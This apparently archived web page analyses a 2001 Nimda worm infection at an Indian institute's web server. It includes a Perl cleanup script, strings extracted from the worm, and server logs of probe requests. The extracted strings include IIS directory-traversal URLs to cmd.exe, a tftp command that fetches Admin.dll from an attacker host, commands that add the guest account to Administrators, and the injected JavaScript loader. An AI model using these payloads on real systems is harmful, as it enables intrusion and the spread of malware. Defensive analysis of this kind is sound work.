anarchius.org

Exhibits related to the Nimda attack at www.iimcal.ac.in

Exhibit A - CleanScript.pl (The script to clean the script in the infected file heirarchy.)

#!/usr/bin/perl

#Change this with the starting point of your # directory dump $dir = "/home/n_ravikiran/Website";

&listdirectory($dir);

sub listdirectory { local($dir); local(@lines); local($subdir); local($lvl_counter); local($list_length);

$dir = $_[0]; if(opendir (DIR, $dir)) { @lines = readdir (DIR); closedir (DIR); $lvl_counter = 2; $list_length = ( scalar @lines ); while ($lvl_counter < $list_length) { $subdir = $dir."/".$lines[$lvl_counter]; if(opendir (SUBDIR, $subdir)) { closedir (SUBDIR); &listdirectory($subdir); } else { &processnames($subdir); } $lvl_counter++; } } }

sub processnames { $filecount++; open(FP,$_[0]); @totalFile = <FP>; close(FP); open(FP,">$_[0]"); foreach $line (@totalFile) { if( $line =~ /readme.eml/) { print ($line); } else { print FP $line; } }

close(FP);

print ("$filecount $_[0]\n"); }

Exhibit B - Interesting Strings

a) Some Registry Entries.

System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

b) The header of the mail file. Note the content type is called wave ;) the neat trick used to deliver an executable file. The file however is called readme.exe

MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> --====_ABC1234567890DEF_====

c) Some more beautiful ideas. The hiding mechanism of the virus in case cleaning is done from the dos prompt or otherwise. Causing the setup to 'update' the machine with the virus at boot time.

NUL= [rename] \wininit.ini

d) Payload attack method. Notice the enabling of the sharing. Then the Administrator access to guests. The hiding of the file extensions. (The reason for this is wonderful. readme. exe comes with an icon that looks like that of HTML files of IE, with the symbol 'e'. If extensions are displayed this method of inducing users to execute the file would fail)

Personal Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders \*.* EXPLORER fsdhqherwqi2001 SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add HideFileExt ShowSuperHidden Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced \\%s %ld %ld %ld %ld %ld

e) On NT, hiding and maybe a timebomb? Note the counter...

ID Process Elapsed Time Priority Base Working Set Peak Working Set % User Time % Privileged Time % Processor Time Process Counter 009 software\microsoft\windows nt\currentversion\perflib\009 Counters Version Last Counter software\microsoft\windows nt\currentversion\perflib

f) NT again. Attack on IIS this way.

/scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll

g) The added string for delivery of payload. This started it all.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html> /Admin.dll GET %s HTTP/1.0 Host: www Connnection: close

h) Unknown agenda of the payload. Winzip is not infected, says symantec. The dll that is infected and that prevents Word from working properly (or any editor that uses it). The string that goes into the system.ini file.

readme main index default html .asp .htm \readme.eml .exe winzip32.exe riched20.dll .nws .eml .doc .exe dontrunold

i) Some references that show the work that the payload does on the user side.

gethostbyname gethostname sendto send recvfrom recv MAPILogoff MAPISendMail MAPIFreeBuffer MAPIReadMail MAPIFindNext MAPIResolveName MAPILogon MAPI32.DLL Subject: From: < DATA RCPT TO: < MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe octet

j) Some more Registry Entries

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Type Remark SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$ Parm2enc Parm1enc Flags Path SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\ SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan SYSTEM\CurrentControlSet\Services\lanmanserver\Shares Cache Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail QUIT

Exhibit C - Nimda Attack Sequence

The following lines were the logs of the attack on the Linux machine by a particular IIS server. Although our IIS server fell to the first of these attacks, the Linux server has been braving the blizzard all along. Okay the worm cannot hit it, yet the feeling of safety is great. Initially this was restricted to 203. addresses, but now we are having attacks from all sorts of ip ranges. Also another thing to note is that the attacks have become particularly nasty on this machine, while the patched IIS server was subsequently left alone. Seems as if the choosen one for attack is not entirely random.

203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 347 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314 "-" "-" 203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%252